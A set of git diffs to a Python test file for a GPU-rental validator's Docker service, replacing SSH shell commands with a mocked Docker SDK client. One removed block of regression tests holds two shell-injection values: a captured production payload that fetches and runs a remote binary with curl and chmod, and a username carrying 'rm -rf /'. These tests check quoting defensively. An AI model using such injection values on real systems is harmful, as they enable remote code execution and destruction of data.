+    async def stop(self, *, container_name: str) -> None:
+        self.stopped_containers.append(container_name)
+        if self.stop_error is not None:
+            raise self.stop_error
+
+    async def remove_container(
+        self,
+        *,
+        container_name: str,
+        force: bool = True,
+        remove_volumes: bool = True,
+    ) -> None:
+        self.removed_containers.append(
+            {
+                "container_name": container_name,
+                "force": force,
+                "remove_volumes": remove_volumes,
+            }
+        )
+        if self.remove_error is not None:
+            raise self.remove_error
+
+
+class _FakeRentalDockerFactory:
+    def __init__(self):
+        self.client = _FakeRentalDockerClient()
+        self.connect_calls = []
+
+    def connect(self, *, executor_info: ExecutorSSHInfo, private_key: str):
+        self.connect_calls.append(
+            {"executor_info": executor_info, "private_key": private_key}
+        )
+        return self
+
+    async def __aenter__(self):
+        return self.client
+
+    async def __aexit__(self, exc_type, exc_val, exc_tb):
+        return None
 
 
 def create_mock_port_dict(
@@ -64,7 +145,8 @@ async def docker_service(mock_dependencies):
     service = DockerService(
         ssh_service=ssh_service,
         redis_service=redis_service,
-        attestation_service=attestation_service
+        attestation_service=attestation_service,
+        rental_docker_client_factory=_FakeRentalDockerFactory(),
     )
     return service
 
@@ -714,10 +796,10 @@ async def test_delete_filler_container_treats_missing_container_as_deleted(
 
     docker_service.ssh_service.decrypt_payload = Mock(return_value="private-key")
     docker_service.redis_service.remove_rented_machine = AsyncMock()
-    retry_ssh_mock.side_effect = [
-        _make_retry_error(Exception("Error response from daemon: No such container: filler_missing")),
-        None,
-    ]
+    docker_service.rental_docker_client_factory.client.remove_error = Exception(
+        "Error response from daemon: No such container: filler_missing"
+    )
+    retry_ssh_mock.return_value = None
 
     payload = ContainerDeleteRequest(
         miner_hotkey="miner",
@@ -747,7 +829,14 @@ async def test_delete_filler_container_treats_missing_container_as_deleted(
 
     assert isinstance(result, ContainerDeleted)
     assert result.pod_id == payload.pod_id
-    assert retry_ssh_mock.await_count == 2
+    assert docker_service.rental_docker_client_factory.client.removed_containers == [
+        {
+            "container_name": payload.container_name,
+            "force": True,
+            "remove_volumes": True,
+        }
+    ]
+    assert retry_ssh_mock.await_count == 1
     docker_service.redis_service.remove_rented_machine.assert_awaited_once_with(
         executor_info,
         payload.container_name,
@@ -1248,18 +1337,13 @@ def test_ssh_bootstrap_script_uses_single_watchdog_with_30_second_sleep(docker_s
 
 @pytest.mark.asyncio
 async def test_start_container_restarts_ssh_after_docker_start(docker_service, monkeypatch):
-    """start_container reruns the SSH bootstrap helper after docker start."""
-    ssh_client = AsyncMock()
-    ssh_client.run = AsyncMock()
-    monkeypatch.setattr("services.docker_service.asyncssh.import_private_key", Mock(return_value="pkey"))
-    monkeypatch.setattr(
-        "services.docker_service.asyncssh.connect",
-        Mock(return_value=DummySSHConnectionManager(ssh_client)),
-    )
+    """start_container reruns the SSH bootstrap helper after SDK docker start."""
 
     docker_service.ssh_service.decrypt_payload.return_value = "private-key"
     docker_service._prepare_known_hosts_policy = AsyncMock(return_value=None)
-    docker_service.install_open_ssh_server_and_start_ssh_service = AsyncMock(return_value=True)
+    docker_service.install_open_ssh_server_and_start_ssh_service_with_rental_docker = (
+        AsyncMock(return_value=True)
+    )
 
     payload = ContainerStartRequest(
         miner_hotkey="miner-hotkey",
@@ -1282,9 +1366,11 @@ async def test_start_container_restarts_ssh_after_docker_start(docker_service, m
 
     await docker_service.start_container(payload, executor_info, keypair, "encrypted-private-key")
 
-    ssh_client.run.assert_awaited_once_with("/usr/bin/docker start pod_test")
-    docker_service.install_open_ssh_server_and_start_ssh_service.assert_awaited_once_with(
-        ssh_client=ssh_client,
+    assert docker_service.rental_docker_client_factory.client.started_containers == [
+        "pod_test"
+    ]
+    docker_service.install_open_ssh_server_and_start_ssh_service_with_rental_docker.assert_awaited_once_with(
+        docker_client=docker_service.rental_docker_client_factory.client,
         container_name="pod_test",
         log_tag="start_container_pod-id",
         log_extra={
@@ -1301,17 +1387,11 @@ async def test_start_container_restarts_ssh_after_docker_start(docker_service, m
 @pytest.mark.asyncio
 async def test_start_container_logs_ssh_bootstrap_failure_and_keeps_starting(docker_service, monkeypatch):
     """A failed SSH bootstrap does not interrupt docker start."""
-    ssh_client = AsyncMock()
-    ssh_client.run = AsyncMock()
-    monkeypatch.setattr("services.docker_service.asyncssh.import_private_key", Mock(return_value="pkey"))
-    monkeypatch.setattr(
-        "services.docker_service.asyncssh.connect",
-        Mock(return_value=DummySSHConnectionManager(ssh_client)),
-    )
-
     docker_service.ssh_service.decrypt_payload.return_value = "private-key"
     docker_service._prepare_known_hosts_policy = AsyncMock(return_value=None)
-    docker_service.install_open_ssh_server_and_start_ssh_service = AsyncMock(return_value=False)
+    docker_service.install_open_ssh_server_and_start_ssh_service_with_rental_docker = (
+        AsyncMock(return_value=False)
+    )
 
     payload = ContainerStartRequest(
         miner_hotkey="miner-hotkey",
@@ -1336,9 +1416,101 @@ async def test_start_container_logs_ssh_bootstrap_failure_and_keeps_starting(doc
 
     await docker_service.start_container(payload, executor_info, keypair, "encrypted-private-key")
 
-    ssh_client.run.assert_awaited_once_with("/usr/bin/docker start pod_test")
-    docker_service.install_open_ssh_server_and_start_ssh_service.assert_awaited_once()
+    assert docker_service.rental_docker_client_factory.client.started_containers == [
+        "pod_test"
+    ]
+    docker_service.install_open_ssh_server_and_start_ssh_service_with_rental_docker.assert_awaited_once()
     assert logger_mock.called
+
+
+@pytest.mark.asyncio
+async def test_start_container_sdk_failure_returns_failed_request_without_shell_fallback(
+    docker_service,
+    monkeypatch,
+):
+    docker_service.ssh_service.decrypt_payload.return_value = "private-key"
+    docker_service._prepare_known_hosts_policy = AsyncMock(return_value=None)
+    docker_service.rental_docker_client_factory.client.start_error = Exception(
+        "SDK start failed"
+    )
+    connect_mock = Mock(side_effect=AssertionError("asyncssh fallback is not allowed"))
+    monkeypatch.setattr("services.docker_service.asyncssh.connect", connect_mock)
+
+    payload = ContainerStartRequest(
+        miner_hotkey="miner-hotkey",
+        miner_address="127.0.0.1",
+        miner_port=8000,
+        executor_id=str(uuid4()),
+        pod_id="pod-id",
+        container_name="pod_test",
+    )
+    executor_info = ExecutorSSHInfo(
+        uuid=str(uuid4()),
+        address="127.0.0.1",
+        port=8001,
+        ssh_username="root",
+        ssh_port=2200,
+        python_path="/usr/bin/python3",
+        root_dir="/root/app",
+    )
+
+    result = await docker_service.start_container(
+        payload,
+        executor_info,
+        Mock(ss58_address="validator-hotkey"),
+        "encrypted-private-key",
+    )
+
+    assert isinstance(result, FailedContainerRequest)
+    assert connect_mock.call_count == 0
+    assert docker_service.rental_docker_client_factory.client.started_containers == [
+        "pod_test"
+    ]
+
+
+@pytest.mark.asyncio
+async def test_stop_container_sdk_failure_returns_failed_request_without_shell_fallback(
+    docker_service,
+    monkeypatch,
+):
+    docker_service.ssh_service.decrypt_payload.return_value = "private-key"
+    docker_service._prepare_known_hosts_policy = AsyncMock(return_value=None)
+    docker_service.rental_docker_client_factory.client.stop_error = Exception(
+        "SDK stop failed"
+    )
+    connect_mock = Mock(side_effect=AssertionError("asyncssh fallback is not allowed"))
+    monkeypatch.setattr("services.docker_service.asyncssh.connect", connect_mock)
+
+    payload = ContainerStopRequest(
+        miner_hotkey="miner-hotkey",
+        miner_address="127.0.0.1",
+        miner_port=8000,
+        executor_id=str(uuid4()),
+        pod_id="pod-id",
+        container_name="pod_test",
+    )
+    executor_info = ExecutorSSHInfo(
+        uuid=str(uuid4()),
+        address="127.0.0.1",
+        port=8001,
+        ssh_username="root",
+        ssh_port=2200,
+        python_path="/usr/bin/python3",
+        root_dir="/root/app",
+    )
+
+    result = await docker_service.stop_container(
+        payload,
+        executor_info,
+        Mock(ss58_address="validator-hotkey"),
+        "encrypted-private-key",
+    )
+
+    assert isinstance(result, FailedContainerRequest)
+    assert connect_mock.call_count == 0
+    assert docker_service.rental_docker_client_factory.client.stopped_containers == [
+        "pod_test"
+    ]
 
 
 @pytest.mark.asyncio
@@ -1625,7 +1797,10 @@ async def test_create_container_cleans_stale_vloopback_when_active_volumes_missi
         Mock(return_value=DummySSHConnectionManager(ssh_client)),
     )
     monkeypatch.setattr("services.docker_service.asyncssh.import_private_key", Mock())
-    monkeypatch.setattr("services.docker_service.build_gpu_flags", AsyncMock(return_value=""))
+    monkeypatch.setattr(
+        "services.docker_service.build_gpu_docker_config_for_executor",
+        AsyncMock(return_value=build_gpu_docker_config(["GPU-test"])),
+    )
 
     docker_service.ssh_service.decrypt_payload = Mock(return_value="private-key")
     docker_service.redis_service.add_pending_pod = AsyncMock()
@@ -1646,9 +1821,7 @@ async def test_create_container_cleans_stale_vloopback_when_active_volumes_missi
         "wait_for_port_check_containers",
         AsyncMock(return_value=(True, "ok")),
     )
-    monkeypatch.setattr(docker_service, "_run_docker_create_with_port_retry", AsyncMock())
     monkeypatch.setattr(docker_service, "check_container_running", AsyncMock(return_value=True))
-    monkeypatch.setattr(docker_service, "install_open_ssh_server_and_start_ssh_service", AsyncMock())
     monkeypatch.setattr(docker_service, "stream_log", AsyncMock())
     monkeypatch.setattr(docker_service, "finish_stream_logs", AsyncMock())
     monkeypatch.setattr(docker_service, "handle_stream_logs", AsyncMock())
@@ -1693,9 +1866,11 @@ async def test_create_container_cleans_stale_vloopback_when_active_volumes_missi
     assert docker_service.clean_stale_vloopback_volumes.await_args.kwargs[
         "skip_volume_names"
     ] == set()
-    assert docker_service._run_docker_create_with_port_retry.await_args.kwargs[
-        "local_volume"
-    ] == f"volume_{payload.pod_id}"
+    run_spec = docker_service.rental_docker_client_factory.client.run_specs[-1]
+    assert any(
+        volume.source == f"volume_{payload.pod_id}"
+        for volume in run_spec.volumes
+    )
 
 
 @pytest.mark.asyncio
@@ -1710,7 +1885,10 @@ async def test_create_container_clears_pending_pod_after_successful_filler_creat
         Mock(return_value=DummySSHConnectionManager(ssh_client)),
     )
     monkeypatch.setattr("services.docker_service.asyncssh.import_private_key", Mock())
-    monkeypatch.setattr("services.docker_service.build_gpu_flags", AsyncMock(return_value=""))
+    monkeypatch.setattr(
+        "services.docker_service.build_gpu_docker_config_for_executor",
+        AsyncMock(return_value=build_gpu_docker_config(["GPU-test"])),
+    )
 
     docker_service.ssh_service.decrypt_payload = Mock(return_value="private-key")
     docker_service.redis_service.add_pending_pod = AsyncMock()
@@ -1731,9 +1909,7 @@ async def test_create_container_clears_pending_pod_after_successful_filler_creat
         "wait_for_port_check_containers",
         AsyncMock(return_value=(True, "ok")),
     )
-    monkeypatch.setattr(docker_service, "_run_docker_create_with_port_retry", AsyncMock())
     monkeypatch.setattr(docker_service, "check_container_running", AsyncMock(return_value=True))
-    monkeypatch.setattr(docker_service, "install_open_ssh_server_and_start_ssh_service", AsyncMock())
     monkeypatch.setattr(docker_service, "stream_log", AsyncMock())
     monkeypatch.setattr(docker_service, "finish_stream_logs", AsyncMock())
     monkeypatch.setattr(docker_service, "handle_stream_logs", AsyncMock())
@@ -1781,12 +1957,10 @@ async def test_create_container_clears_pending_pod_after_successful_filler_creat
 
 
 @pytest.mark.asyncio
-async def test_create_container_uses_keepalives_and_docker_pull_timeout(
+async def test_create_container_uses_keepalives_and_sdk_pull(
     docker_service,
     monkeypatch,
 ):
-    import services.docker_service as docker_service_module
-
     ssh_client = AsyncMock()
 
     # DAH-1524: the pull is now preceded by a `docker image inspect` probe.
@@ -1801,7 +1975,10 @@ async def test_create_container_uses_keepalives_and_docker_pull_timeout(
     connect_mock = Mock(return_value=DummySSHConnectionManager(ssh_client))
     monkeypatch.setattr("services.docker_service.asyncssh.connect", connect_mock)
     monkeypatch.setattr("services.docker_service.asyncssh.import_private_key", Mock())
-    monkeypatch.setattr("services.docker_service.build_gpu_flags", AsyncMock(return_value=""))
+    monkeypatch.setattr(
+        "services.docker_service.build_gpu_docker_config_for_executor",
+        AsyncMock(return_value=build_gpu_docker_config(["GPU-test"])),
+    )
 
     docker_service.ssh_service.decrypt_payload = Mock(return_value="private-key")
     docker_service.redis_service.add_pending_pod = AsyncMock()
@@ -1813,8 +1990,7 @@ async def test_create_container_uses_keepalives_and_docker_pull_timeout(
         "generate_portMappings",
         AsyncMock(return_value=([(22, 20001, 20001)], None)),
     )
-    execute_mock = AsyncMock(return_value=(True, ""))
-    monkeypatch.setattr(docker_service, "execute_and_stream_logs", execute_mock)
+    monkeypatch.setattr(docker_service, "execute_and_stream_logs", AsyncMock(return_value=(True, "")))
     monkeypatch.setattr(docker_service, "clean_existing_containers", AsyncMock())
     monkeypatch.setattr(docker_service, "clean_stale_vloopback_volumes", AsyncMock())
     monkeypatch.setattr(docker_service, "create_local_volume", AsyncMock())
@@ -1823,9 +1999,7 @@ async def test_create_container_uses_keepalives_and_docker_pull_timeout(
         "wait_for_port_check_containers",
         AsyncMock(return_value=(True, "ok")),
     )
-    monkeypatch.setattr(docker_service, "_run_docker_create_with_port_retry", AsyncMock())
     monkeypatch.setattr(docker_service, "check_container_running", AsyncMock(return_value=True))
-    monkeypatch.setattr(docker_service, "install_open_ssh_server_and_start_ssh_service", AsyncMock())
     monkeypatch.setattr(docker_service, "stream_log", AsyncMock())
     monkeypatch.setattr(docker_service, "finish_stream_logs", AsyncMock())
     monkeypatch.setattr(docker_service, "handle_stream_logs", AsyncMock())
@@ -1866,12 +2040,9 @@ async def test_create_container_uses_keepalives_and_docker_pull_timeout(
     assert connect_mock.call_args.kwargs["keepalive_interval"] == 30
     assert connect_mock.call_args.kwargs["keepalive_count_max"] == 4
 
-    pull_calls = [
-        call for call in execute_mock.await_args_list
-        if call.kwargs["command"] == f"/usr/bin/docker pull {payload.docker_image}"
+    assert docker_service.rental_docker_client_factory.client.pulled_images == [
+        payload.docker_image
     ]
-    assert len(pull_calls) == 1
-    assert pull_calls[0].kwargs["timeout"] == docker_service_module._DOCKER_PULL_TIMEOUT_SECONDS
 
 
 @pytest.mark.asyncio
@@ -1899,17 +2070,16 @@ async def test_create_container_reports_docker_pull_failure_step(
     docker_service.ssh_service.decrypt_payload = Mock(return_value="private-key")
     docker_service.redis_service.add_pending_pod = AsyncMock()
     docker_service.redis_service.remove_pending_pod = AsyncMock()
+    docker_service.rental_docker_client_factory.client.pull_error = Exception(
+        "[Errno 104] Connection reset by peer"
+    )
     monkeypatch.setattr(docker_service, "_prepare_known_hosts_policy", AsyncMock(return_value=None))
     monkeypatch.setattr(
         docker_service,
         "generate_portMappings",
         AsyncMock(return_value=([(22, 20001, 20001)], None)),
     )
-    monkeypatch.setattr(
-        docker_service,
-        "execute_and_stream_logs",
-        AsyncMock(side_effect=Exception("[Errno 104] Connection reset by peer")),
-    )
+    monkeypatch.setattr(docker_service, "execute_and_stream_logs", AsyncMock())
     monkeypatch.setattr(docker_service, "finish_stream_logs", AsyncMock())
     monkeypatch.setattr(docker_service, "handle_stream_logs", AsyncMock())
 
@@ -3267,7 +3437,10 @@ async def test_create_container_fresh_sizing_uses_effective_values(
         Mock(return_value=DummySSHConnectionManager(ssh_client)),
     )
     monkeypatch.setattr("services.docker_service.asyncssh.import_private_key", Mock())
-    monkeypatch.setattr("services.docker_service.build_gpu_flags", AsyncMock(return_value=""))
+    monkeypatch.setattr(
+        "services.docker_service.build_gpu_docker_config_for_executor",
+        AsyncMock(return_value=build_gpu_docker_config(["GPU-test"])),
+    )
 
     docker_service.ssh_service.decrypt_payload = Mock(return_value="private-key")
     docker_service.redis_service.add_pending_pod = AsyncMock()
@@ -3288,9 +3461,7 @@ async def test_create_container_fresh_sizing_uses_effective_values(
         "wait_for_port_check_containers",
         AsyncMock(return_value=(True, "ok")),
     )
-    monkeypatch.setattr(docker_service, "_run_docker_create_with_port_retry", AsyncMock())
     monkeypatch.setattr(docker_service, "check_container_running", AsyncMock(return_value=True))
-    monkeypatch.setattr(docker_service, "install_open_ssh_server_and_start_ssh_service", AsyncMock())
     monkeypatch.setattr(docker_service, "stream_log", AsyncMock())
     monkeypatch.setattr(docker_service, "finish_stream_logs", AsyncMock())
     monkeypatch.setattr(docker_service, "handle_stream_logs", AsyncMock())
@@ -3333,9 +3504,9 @@ async def test_create_container_fresh_sizing_uses_effective_values(
 
     # Assert: fresh-computed volume limit reaches docker volume create
     assert docker_service.create_local_volume.await_args.kwargs["limit"] == 393
-    # Assert: fresh-computed storage limit reaches docker run --storage-opt
-    run_command = docker_service._run_docker_create_with_port_retry.await_args.kwargs["command"]
-    assert "--storage-opt size=196g" in run_command
+    # Assert: fresh-computed storage limit reaches Docker SDK host config data
+    run_spec = docker_service.rental_docker_client_factory.client.run_specs[-1]
+    assert run_spec.storage_limit_gb == 196
     # Assert: ContainerCreated carries effective values, not payload echoes
     assert result.volume_limit_gb == 393
     assert result.storage_limit_gb == 196

--- a/neurons/validators/tests/test_docker_service.py
+++ b/neurons/validators/tests/test_docker_service.py
@@ -14,6 +14,7 @@ from services.docker_service import (
 from services.rental_docker_sdk import ContainerExecResult, build_gpu_docker_config
 from payload_models.payloads import (
     ContainerCreateRequest,
+    CustomOptions,
     ContainerDeleteRequest,
     ContainerDeleted,
     ContainerStartRequest,
@@ -2151,6 +2152,106 @@ async def test_create_container_reports_docker_pull_failure_step(
     )
 
     assert result.failure_step == "docker_pull"
+    docker_service.redis_service.remove_pending_pod.assert_awaited_once_with(
+        payload.miner_hotkey,
+        payload.executor_id,
+        payload.pod_id,
+    )
+
+
+@pytest.mark.asyncio
+async def test_create_container_reports_set_environment_failure_step(
+    docker_service,
+    monkeypatch,
+):
+    ssh_client = AsyncMock()
+    ssh_client.run = AsyncMock(return_value=_make_ssh_command_result())
+    monkeypatch.setattr(
+        "services.docker_service.asyncssh.connect",
+        Mock(return_value=DummySSHConnectionManager(ssh_client)),
+    )
+    monkeypatch.setattr("services.docker_service.asyncssh.import_private_key", Mock())
+    monkeypatch.setattr(
+        "services.docker_service.build_gpu_docker_config_for_executor",
+        AsyncMock(return_value=build_gpu_docker_config(["GPU-test"])),
+    )
+
+    docker_service.ssh_service.decrypt_payload = Mock(return_value="private-key")
+    docker_service.redis_service.add_pending_pod = AsyncMock()
+    docker_service.redis_service.remove_pending_pod = AsyncMock()
+    docker_service.redis_service.add_rented_pod = AsyncMock()
+    monkeypatch.setattr(docker_service, "_prepare_known_hosts_policy", AsyncMock(return_value=None))
+    monkeypatch.setattr(
+        docker_service,
+        "generate_portMappings",
+        AsyncMock(return_value=([(22, 20001, 20001)], None)),
+    )
+    monkeypatch.setattr(docker_service, "execute_and_stream_logs", AsyncMock())
+    monkeypatch.setattr(docker_service, "clean_existing_containers", AsyncMock())
+    monkeypatch.setattr(docker_service, "clean_stale_vloopback_volumes", AsyncMock())
+    monkeypatch.setattr(docker_service, "create_local_volume", AsyncMock())
+    monkeypatch.setattr(
+        docker_service,
+        "wait_for_port_check_containers",
+        AsyncMock(return_value=(True, "ok")),
+    )
+    monkeypatch.setattr(docker_service, "check_container_running", AsyncMock(return_value=True))
+    monkeypatch.setattr(
+        docker_service,
+        "install_open_ssh_server_and_start_ssh_service_with_rental_docker",
+        AsyncMock(return_value=True),
+    )
+    monkeypatch.setattr(
+        docker_service,
+        "add_ssh_public_keys_with_rental_docker",
+        AsyncMock(),
+    )
+    monkeypatch.setattr(
+        docker_service,
+        "add_environment_variables_with_rental_docker",
+        AsyncMock(return_value=False),
+    )
+    monkeypatch.setattr(docker_service, "stream_log", AsyncMock())
+    monkeypatch.setattr(docker_service, "finish_stream_logs", AsyncMock())
+    monkeypatch.setattr(docker_service, "handle_stream_logs", AsyncMock())
+
+    payload = ContainerCreateRequest(
+        miner_hotkey="miner",
+        executor_id=str(uuid4()),
+        pod_id=str(uuid4()),
+        docker_image="daturaai/pytorch:test",
+        user_public_keys=["ssh-ed25519 test-key"],
+        gpu_uuids=["GPU-test"],
+        cpu_count=1,
+        memory_gb=1,
+        custom_options=CustomOptions(environment={"APP_MODE": "prod"}),
+        volume_limit_gb=2,
+        storage_limit_gb=1,
+        available_ports=[PayloadPortMapping(internal_port=20001, external_port=20001)],
+        pod_mapping=[],
+        active_container_names=[],
+        active_volume_names=[],
+    )
+    executor_info = ExecutorSSHInfo(
+        uuid=payload.executor_id,
+        address="127.0.0.1",
+        port=8080,
+        ssh_username="root",
+        ssh_port=2200,
+        python_path="/usr/bin/python",
+        root_dir="/root/app",
+    )
+
+    result = await docker_service.create_container(
+        payload=payload,
+        executor_info=executor_info,
+        keypair=Mock(ss58_address="validator-hotkey"),
+        private_key="encrypted",
+    )
+
+    assert isinstance(result, FailedContainerRequest)
+    assert result.failure_step == "set_environment"
+    docker_service.redis_service.add_rented_pod.assert_not_awaited()
     docker_service.redis_service.remove_pending_pod.assert_awaited_once_with(
         payload.miner_hotkey,
         payload.executor_id,

--- a/neurons/validators/tests/test_docker_service.py
+++ b/neurons/validators/tests/test_docker_service.py
@@ -28,6 +28,8 @@ from datura.requests.miner_requests import ExecutorSSHInfo
 class _FakeRentalDockerClient:
     def __init__(self):
         self.login_calls = []
+        self.inspected_images = []
+        self.existing_images = set()
         self.pulled_images = []
         self.run_specs = []
         self.exec_specs = []
@@ -44,6 +46,10 @@ class _FakeRentalDockerClient:
 
     async def login(self, *, username: str, password: str) -> None:
         self.login_calls.append({"username": username, "password": password})
+
+    async def image_exists(self, *, image: str) -> bool:
+        self.inspected_images.append(image)
+        return image in self.existing_images
 
     async def pull(self, *, image: str) -> None:
         self.pulled_images.append(image)

--- a/neurons/validators/tests/test_docker_service.py
+++ b/neurons/validators/tests/test_docker_service.py
@@ -1,4 +1,3 @@
-import shlex
 from unittest.mock import AsyncMock, Mock, MagicMock, patch
 from uuid import uuid4, UUID
 from datetime import datetime
@@ -2154,64 +2153,6 @@ async def test_clean_containers_no_volume_cleanup_when_disabled(docker_service, 
     # Assert — only one call for container rm, no volume command
     assert retry_ssh_mock.call_count == 1
     assert "docker rm" in retry_ssh_mock.call_args_list[0][0][1]
-
-
-# DAH-2009: shell-injection RCE via docker_password — verify _build_docker_login_command
-# wraps credentials with shlex.quote so attacker payloads stay literal arguments to echo.
-
-
-def test_build_docker_login_command_neutralizes_attack_payload_in_password():
-    """The 2026-04-27 RCE payload must end up as a single argument to echo, not as injected commands."""
-    # Arrange — exact payload captured in production
-    malicious_password = (
-        "x' | curl https://x0.at/mney -o /tmp/mney"
-        "&&chmod +x /tmp/mney && /tmp/mney   |echo '"
-    )
-
-    # Act
-    command = DockerService._build_docker_login_command("user", malicious_password)
-    tokens = shlex.split(command)
-
-    # Assert — the entire payload is one token after `echo`, so the shell
-    # never reaches `curl`/`chmod`/`/tmp/mney` as commands.
-    assert tokens[0] == "echo"
-    assert tokens[1] == malicious_password
-    assert tokens[2] == "|"
-    assert tokens[3] == "/usr/bin/docker"
-    assert tokens[4] == "login"
-    assert tokens[5] == "--username"
-    assert tokens[6] == "user"
-    assert tokens[7] == "--password-stdin"
-
-
-def test_build_docker_login_command_preserves_legitimate_password_with_metachars():
-    """Strong real-world passwords containing &, $, ', ` must round-trip unchanged."""
-    # Arrange — sample of in-production legitimate passwords
-    legit_passwords = [
-        "cJhMt$8^?jc)n8&",
-        "Grande@Cor#Hube&Pasa307",
-        "dcb&L#%iJh^c@DXHNJommE@94$!Qk!9n",
-        "k!&2Ruz3jnbQ@EcB42bU",
-    ]
-
-    # Act + Assert — each password becomes exactly one shell token to echo.
-    for password in legit_passwords:
-        command = DockerService._build_docker_login_command("user", password)
-        tokens = shlex.split(command)
-        assert tokens[1] == password, f"password mangled: {password!r} → {tokens[1]!r}"
-
-
-def test_build_docker_login_command_quotes_username_too():
-    """docker_username is also injected via f-string — must be quoted."""
-    # Arrange — username carrying shell metacharacters
-    malicious_username = "user'; rm -rf / #"
-
-    # Act
-    command = DockerService._build_docker_login_command(malicious_username, "pw")
-    tokens = shlex.split(command)
-
-    # Assert — the entire username appears as one token after --username.
-    assert tokens[6] == malicious_username
 
 
 def test_local_volume_timeout_stays_default_for_small_or_unlimited_volumes():

--- a/neurons/validators/tests/test_docker_service.py
+++ b/neurons/validators/tests/test_docker_service.py
@@ -36,6 +36,7 @@ class _FakeRentalDockerClient:
         self.started_containers = []
         self.stopped_containers = []
         self.removed_containers = []
+        self.created_volumes = []
         self.removed_volumes = []
         self.pruned_images = 0
         self.pull_error = None
@@ -91,6 +92,23 @@ class _FakeRentalDockerClient:
         )
         if self.remove_error is not None:
             raise self.remove_error
+
+    async def create_volume(
+        self,
+        *,
+        volume_name: str,
+        driver: str | None = None,
+        driver_opts: dict[str, str] | None = None,
+        timeout: int | None = None,
+    ) -> None:
+        self.created_volumes.append(
+            {
+                "volume_name": volume_name,
+                "driver": driver,
+                "driver_opts": driver_opts,
+                "timeout": timeout,
+            }
+        )
 
     async def remove_volume(self, *, volume_name: str, force: bool = False) -> None:
         self.removed_volumes.append(
@@ -2183,11 +2201,13 @@ async def test_create_local_volume_uses_scaled_timeout_for_large_limited_volume(
 ):
     ssh_client = AsyncMock()
     ssh_client.run = AsyncMock(return_value=Mock(stdout="/var/lib/docker\n"))
-    execute = AsyncMock()
-    monkeypatch.setattr(docker_service, "execute_and_stream_logs", execute)
+    stream_log = AsyncMock()
+    monkeypatch.setattr(docker_service, "stream_log", stream_log)
+    docker_client = _FakeRentalDockerClient()
 
     await docker_service.create_local_volume(
         ssh_client=ssh_client,
+        docker_client=docker_client,
         local_volume="volume_test",
         log_tag="tag",
         log_text="Creating docker volume volume_test",
@@ -2196,17 +2216,15 @@ async def test_create_local_volume_uses_scaled_timeout_for_large_limited_volume(
         timeout=10,
     )
 
-    execute.assert_awaited_once()
-    assert execute.await_args.kwargs["timeout"] == 133
-    assert execute.await_args.kwargs["log_extra"] == {
-        "local_volume": "volume_test",
-        "volume_limit_gb": 1024,
-        "requested_timeout_seconds": 10,
-        "effective_timeout_seconds": 133,
-        "timeout_scaled": True,
-        "loopback_plugin": "vloopback",
-        "sparse": False,
-    }
+    stream_log.assert_awaited_once_with("Creating docker volume volume_test", "success", "tag")
+    assert docker_client.created_volumes == [
+        {
+            "volume_name": "volume_test",
+            "driver": "vloopback",
+            "driver_opts": {"size": "1024g"},
+            "timeout": 133,
+        }
+    ]
 
 
 # ---------------------------------------------------------------------------
@@ -3460,7 +3478,7 @@ async def test_create_container_fresh_sizing_uses_effective_values(
         private_key="encrypted",
     )
 
-    # Assert: fresh-computed volume limit reaches docker volume create
+    # Assert: fresh-computed volume limit reaches local volume creation
     assert docker_service.create_local_volume.await_args.kwargs["limit"] == 393
     # Assert: fresh-computed storage limit reaches Docker SDK host config data
     run_spec = docker_service.rental_docker_client_factory.client.run_specs[-1]

--- a/neurons/validators/tests/test_docker_service.py
+++ b/neurons/validators/tests/test_docker_service.py
@@ -990,7 +990,10 @@ def _patch_create_container_happy_path(docker_service, monkeypatch):
         Mock(return_value=DummySSHConnectionManager(ssh_client)),
     )
     monkeypatch.setattr("services.docker_service.asyncssh.import_private_key", Mock())
-    monkeypatch.setattr("services.docker_service.build_gpu_flags", AsyncMock(return_value=""))
+    monkeypatch.setattr(
+        "services.docker_service.build_gpu_docker_config_for_executor",
+        AsyncMock(return_value=build_gpu_docker_config(["GPU-test"])),
+    )
 
     docker_service.ssh_service.decrypt_payload = Mock(return_value="private-key")
     docker_service.redis_service.add_pending_pod = AsyncMock()
@@ -1068,6 +1071,7 @@ async def test_create_customer_rental_starts_inspector_collector(docker_service,
         ssh_port=2200,
         python_path="/usr/bin/python",
         root_dir="/root/app",
+        ssh_host_key=FAKE_SSH_HOST_KEY,
     )
 
     await docker_service.create_container(
@@ -1120,6 +1124,7 @@ async def test_create_customer_rental_skips_inspector_collector_when_disabled(
         ssh_port=2200,
         python_path="/usr/bin/python",
         root_dir="/root/app",
+        ssh_host_key=FAKE_SSH_HOST_KEY,
     )
 
     await docker_service.create_container(
@@ -1163,6 +1168,7 @@ async def test_create_filler_skips_inspector_collector_start(docker_service, mon
         ssh_port=2200,
         python_path="/usr/bin/python",
         root_dir="/root/app",
+        ssh_host_key=FAKE_SSH_HOST_KEY,
     )
 
     await docker_service.create_container(
@@ -1202,6 +1208,7 @@ async def test_delete_last_customer_rental_stops_inspector_collector(
         ssh_port=2200,
         python_path="/usr/bin/python",
         root_dir="/root/app",
+        ssh_host_key=FAKE_SSH_HOST_KEY,
     )
 
     result = await docker_service.delete_container(
@@ -1245,6 +1252,7 @@ async def test_delete_customer_rental_keeps_collector_with_remaining_pods(
         ssh_port=2200,
         python_path="/usr/bin/python",
         root_dir="/root/app",
+        ssh_host_key=FAKE_SSH_HOST_KEY,
     )
 
     await docker_service.delete_container(
@@ -1283,6 +1291,7 @@ async def test_delete_filler_skips_inspector_collector_stop(
         ssh_port=2200,
         python_path="/usr/bin/python",
         root_dir="/root/app",
+        ssh_host_key=FAKE_SSH_HOST_KEY,
     )
 
     await docker_service.delete_container(
@@ -2521,11 +2530,13 @@ async def test_create_local_volume_sparse_true_appends_sparse_flag(
     """sparse=True (full-node rental) → `-o sparse=true` appended after the size cap."""
     ssh_client = AsyncMock()
     ssh_client.run = AsyncMock(return_value=Mock(stdout="/var/lib/docker\n"))
-    execute = AsyncMock()
-    monkeypatch.setattr(docker_service, "execute_and_stream_logs", execute)
+    stream_log = AsyncMock()
+    monkeypatch.setattr(docker_service, "stream_log", stream_log)
+    docker_client = _FakeRentalDockerClient()
 
     await docker_service.create_local_volume(
         ssh_client=ssh_client,
+        docker_client=docker_client,
         local_volume="volume_test",
         log_tag="tag",
         log_text="Creating docker volume volume_test",
@@ -2534,12 +2545,15 @@ async def test_create_local_volume_sparse_true_appends_sparse_flag(
         sparse=True,
     )
 
-    command = execute.await_args.kwargs["command"]
-    assert command == (
-        "/usr/bin/docker volume create -d vloopback volume_test "
-        "-o size=200g -o sparse=true"
-    )
-    assert execute.await_args.kwargs["log_extra"]["sparse"] is True
+    stream_log.assert_awaited_once_with("Creating docker volume volume_test", "success", "tag")
+    assert docker_client.created_volumes == [
+        {
